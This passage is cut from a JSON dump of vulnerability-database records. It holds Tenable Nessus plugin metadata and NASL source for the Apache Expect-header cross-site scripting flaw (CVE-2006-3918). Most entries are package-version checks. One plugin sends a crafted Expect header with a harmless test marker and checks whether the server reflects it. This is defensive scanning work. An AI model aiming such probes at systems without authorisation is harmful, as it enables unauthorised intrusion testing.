audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2006:0619\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-2.0.46-61.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"httpd-devel-2.0.46-61.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"mod_ssl-2.0.46-61.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-2.0.52-28.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-devel-2.0.52-28.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-manual-2.0.52-28.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"httpd-suexec-2.0.52-28.ent\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"mod_ssl-2.0.52-28.ent\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:54:06", "references": ["http://www.securityfocus.com/archive/1/441014/30/0/", "http://seclists.org/bugtraq/2006/May/0440.html", "http://support.f5.com/kb/en-us/solutions/public/6000/600/sol6669.html", "http://www.nessus.org/u?636217b2"], "pluginID": "78212", "description": "The remote BIG-IP device is missing a patch required by a security advisory.", "edition": 8, "reporter": "Tenable", "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : Apache HTTP Expect header handling (SOL6669)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "F5 Networks Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918"], "modified": "2018-07-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL6669.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78212", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL6669.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78212);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/10 14:27:32\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n\n script_name(english:\"F5 Networks BIG-IP : Apache HTTP Expect header handling (SOL6669)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote BIG-IP device is missing a patch required by a security\nadvisory.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://seclists.org/bugtraq/2006/May/0440.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.f5.com/kb/en-us/solutions/public/6000/600/sol6669.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.securityfocus.com/archive/1/441014/30/0/\"\n );\n # https://web.archive.org/web/20070523192439/http://httpd.apache.org/security/vulnerabilities_13.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?636217b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL6669.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL6669\";\nvmatrix = make_array();\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"9.2.0-9.2.5\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"9.3\",\"9.4\",\"10\",\"11\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"9.3\",\"9.4\",\"10\",\"11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"9.2.2-9.2.5\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"9.3\",\"9.4\",\"10\",\"11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"9.0.0-9.2.5\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"9.3\",\"9.4\",\"9.6\",\"10\",\"11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-02T00:02:28", "references": ["http://www-1.ibm.com/support/docview.wss?uid=swg1PK24631", "http://www-1.ibm.com/support/docview.wss?uid=swg24017314", "http://seclists.org/bugtraq/2006/May/440", "http://www.apache.org/dist/httpd/CHANGES_1.3", "http://www.apache.org/dist/httpd/CHANGES_2.0", "http://seclists.org/bugtraq/2006/Jul/423", "http://www.apache.org/dist/httpd/CHANGES_2.2", "http://seclists.org/bugtraq/2006/May/150"], "pluginID": "22254", "description": "The remote web server fails to sanitize the contents of an 'Expect' request header before using it to generate dynamic web content. An unauthenticated, remote attacker may be able to leverage this issue to launch cross-site scripting attacks against the affected service, perhaps through specially crafted ShockWave (SWF) files.", "edition": 5, "reporter": "Tenable", "published": "2006-08-23T00:00:00", "title": "Web Server Expect Header XSS", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses : XSS", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2007-5944"], "modified": "2018-08-07T00:00:00", "cpe": [], "id": "WWW_EXPECT_XSS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22254);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/08/07 16:46:50\");\n\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-5944\");\n script_bugtraq_id(19661, 26457);\n\n script_name(english:\"Web Server Expect Header XSS\");\n script_summary(english:\"Checks for an XSS flaw involving Expect Headers\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a cross-site scripting attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server fails to sanitize the contents of an 'Expect'\nrequest header before using it to generate dynamic web content. An\nunauthenticated, remote attacker may be able to leverage this issue to\nlaunch cross-site scripting attacks against the affected service,\nperhaps through specially crafted ShockWave (SWF) files.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/May/150\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/May/440\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Jul/423\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apache.org/dist/httpd/CHANGES_2.2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apache.org/dist/httpd/CHANGES_2.0\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apache.org/dist/httpd/CHANGES_1.3\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-1.ibm.com/support/docview.wss?uid=swg1PK24631\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-1.ibm.com/support/docview.wss?uid=swg24017314\");\n script_set_attribute(attribute:\"solution\", value:\n\"Check with the vendor for an update to the web server. For Apache,\nthe issue is reportedly fixed by versions 1.3.35 / 2.0.57 / 2.2.2; for\nIBM HTTP Server, upgrade to 6.0.2.13 / 6.1.0.1; for IBM WebSphere\nApplication Server, upgrade to 5.1.1.17.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service2.nasl\", \"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"raw.inc\");\n\nif (islocalhost() ) exit(0, \"Nessus can not test for the issue over the loopback interface.\");\n\nport = get_http_port(default:80);\nif ( get_port_transport(port) != ENCAPS_IP ) exit(0, \"This script only works for HTTP connections\");\n\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n\n# Generate a request to exploit the flaw.\nexploit = string(SCRIPT_NAME, \" testing for BID 19661 <test>\");\nrq = http_mk_get_req(port: port, item: \"/\", add_headers: make_array(\"Expect\", exploit));\nbuf = http_mk_buffer_from_req(req: rq);\nif ( buf == NULL ) audit(AUDIT_FN_FAIL, \"http_mk_buffer_from_req\");\n\n# Send the request but don't worry about the response.\nfilter = string(\n \"tcp and \",\n \"src host \", get_host_ip(), \" and \",\n \"src port \", port, \" and \",\n \"dst port \", get_source_port(soc)\n);\nres = send_capture(socket:soc, data:buf, pcap_filter:filter);\nif (res == NULL) audit(AUDIT_RESP_NOT, port);\nflags = get_tcp_element(tcp:res, element:\"th_flags\");\nif (flags & TH_ACK == 0) exit(0, \"The TCP response from the web server on port \"+port+\" was not an ACK.\");\n\n\n# Half-close the connection.\n#\n# nb: the server sends a 417 response only after the connection is\n# closed; a half-close allows us to receive the response.\nip = ip();\nseq = get_tcp_element(tcp:res, element:\"th_ack\");\ntcp = tcp(\n th_dport : port,\n th_sport : get_source_port(soc),\n th_seq : seq,\n th_ack : seq,\n th_win : get_tcp_element(tcp:res, element:\"th_win\"),\n th_flags : TH_FIN|TH_ACK\n);\nhalfclose = mkpacket(ip, tcp);\nr = send_packet(halfclose, pcap_filter:filter, pcap_timeout:5);\nif ( !isnull(r) && (\"417 Expectation Failed\" >< r ||\n\t\t \"417 invalid Expect header value:\" >< r ) )\n{\n res2 = strstr(r, \"417 Expectation Failed\");\n if ( isnull(res2) ) res2 = strstr(r, \"417 invalid Expect header value:\");\n}\n\n\n# There's a problem if we see our exploit in the response.\nres = recv(socket:soc, length:1024);\nclose(soc);\n\nif ( isnull(res)) res = res2;\n\nif (\n res &&\n (\n \"417 Expectation Failed\" >< res ||\n \"417 invalid Expect header value:\" >< res\n ) &&\n exploit >< res\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report = strcat(\n '\\n',\n 'Nessus was able to exploit the issue using the following request :\\n',\n '\\n',\n crap(data:\"-\", length:30), \" snip \", crap(data:\"-\", length:30), '\\n',\n http_mk_buffer_from_req(req:rq),\n crap(data:\"-\", length:30), \" snip \", crap(data:\"-\", length:30), '\\n'\n );\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:45:33", "references": ["https://security-tracker.debian.org/tracker/CVE-2006-3918", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=343466", "https://security-tracker.debian.org/tracker/CVE-2005-3352", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=381381", "http://www.debian.org/security/2006/dsa-1167"], "pluginID": "22709", "description": "Several remote vulnerabilities have been discovered in the Apache, the worlds most popular webserver, which may lead to the execution of arbitrary web script. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2005-3352 A cross-site scripting (XSS) flaw exists in the mod_imap component of the Apache server.\n\n - CVE-2006-3918 Apache does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks.", "edition": 6, "reporter": "Tenable", "published": "2006-10-14T00:00:00", "title": "Debian DSA-1167-1 : apache - missing input sanitising ", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2005-3352"], "modified": "2018-08-09T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:apache"], "id": "DEBIAN_DSA-1167.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22709", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1167. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22709);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/08/09 17:06:36\");\n\n script_cve_id(\"CVE-2005-3352\", \"CVE-2006-3918\");\n script_xref(name:\"DSA\", value:\"1167\");\n\n script_name(english:\"Debian DSA-1167-1 : apache - missing input sanitising \");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in the Apache, the\nworlds most popular webserver, which may lead to the execution of\narbitrary web script. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2005-3352\n A cross-site scripting (XSS) flaw exists in the mod_imap\n component of the Apache server.\n\n - CVE-2006-3918\n Apache does not sanitize the Expect header from an HTTP\n request when it is reflected back in an error message,\n which might allow cross-site scripting (XSS) style\n attacks.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=381381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=343466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2005-3352\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-3918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1167\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache package.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.3.33-6sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"apache\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-common\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dbg\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-dev\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-doc\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-perl\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-ssl\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"apache-utils\", reference:\"1.3.33-6sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"libapache-mod-perl\", reference:\"1.29.0.3-6sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:32:51", "references": ["http://support.novell.com/security/cve/CVE-2007-5000.html", "http://support.novell.com/security/cve/CVE-2007-6388.html", "http://support.novell.com/security/cve/CVE-2008-0005.html", "http://support.novell.com/security/cve/CVE-2006-3918.html"], "pluginID": "41207", "description": "This update fixes multiple bugs in apache :\n\n - cross-site scripting problem when processing the 'Expect' header. (CVE-2006-3918)\n\n - cross-site scripting problem in mod_imap.\n (CVE-2007-5000)\n\n - cross-site scripting problem in mod_status.\n (CVE-2007-6388)\n\n - cross-site scripting problem in the ftp proxy module.\n (CVE-2008-0005)", "edition": 4, "reporter": "Tenable", "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : Apache (YOU Patch Number 12125)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2008-0005", "CVE-2007-6388", "CVE-2007-5000"], "modified": "2013-07-20T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12125.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=41207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41207);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2013/07/20 01:58:54 $\");\n\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-5000\", \"CVE-2007-6388\", \"CVE-2008-0005\");\n\n script_name(english:\"SuSE9 Security Update : Apache (YOU Patch Number 12125)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes multiple bugs in apache :\n\n - cross-site scripting problem when processing the\n 'Expect' header. (CVE-2006-3918)\n\n - cross-site scripting problem in mod_imap.\n (CVE-2007-5000)\n\n - cross-site scripting problem in mod_status.\n (CVE-2007-6388)\n\n - cross-site scripting problem in the ftp proxy module.\n (CVE-2008-0005)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2006-3918.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-5000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-6388.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-0005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12125.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cwe_id(79);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"apache-1.3.29-71.26\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"apache-devel-1.3.29-71.26\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"apache-doc-1.3.29-71.26\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"apache-example-pages-1.3.29-71.26\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"mod_ssl-2.8.16-71.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:55:14", "references": [], "pluginID": "30184", "description": "It was discovered that Apache did not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. This was only vulnerable in Ubuntu 6.06. (CVE-2006-3918)\n\nIt was discovered that when configured as a proxy server and using a threaded MPM, Apache did not properly sanitize its input. A remote attacker could send Apache crafted date headers and cause a denial of service via application crash. By default, mod_proxy is disabled in Ubuntu. (CVE-2007-3847)\n\nIt was discovered that mod_autoindex did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. (CVE-2007-4465)\n\nIt was discovered that mod_imap/mod_imagemap did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_imap/mod_imagemap is disabled in Ubuntu. (CVE-2007-5000)\n\nIt was discovered that mod_status when status pages were available, allowed for cross-site scripting attacks. By default, mod_status is disabled in Ubuntu. (CVE-2007-6388)\n\nIt was discovered that mod_proxy_balancer did not sanitize its input, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6421)\n\nIt was discovered that mod_proxy_balancer could be made to dereference a NULL pointer. A remote attacker could send a crafted request and cause a denial of service via application crash. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6422)\n\nIt was discovered that mod_proxy_ftp did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_ftp is disabled in Ubuntu. (CVE-2008-0005).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 7, "reporter": "Tenable", "published": "2008-02-05T00:00:00", "title": "Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : apache2 vulnerabilities (USN-575-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2007-4465", "CVE-2008-0005", "CVE-2007-6421", "CVE-2007-3847", "CVE-2007-6388", "CVE-2007-5000", "CVE-2007-6422"], "modified": "2018-08-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-src", "p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev", "cpe:/o:canonical:ubuntu_linux:7.10", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild", "cpe:/o:canonical:ubuntu_linux:6.10", "p-cpe:/a:canonical:ubuntu_linux:libapr0", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork", "p-cpe:/a:canonical:ubuntu_linux:libapr0-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2", 